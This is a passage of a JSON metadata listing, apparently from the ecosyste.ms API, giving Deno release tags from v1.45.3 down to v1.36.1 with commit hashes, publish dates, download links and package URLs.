ob_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/den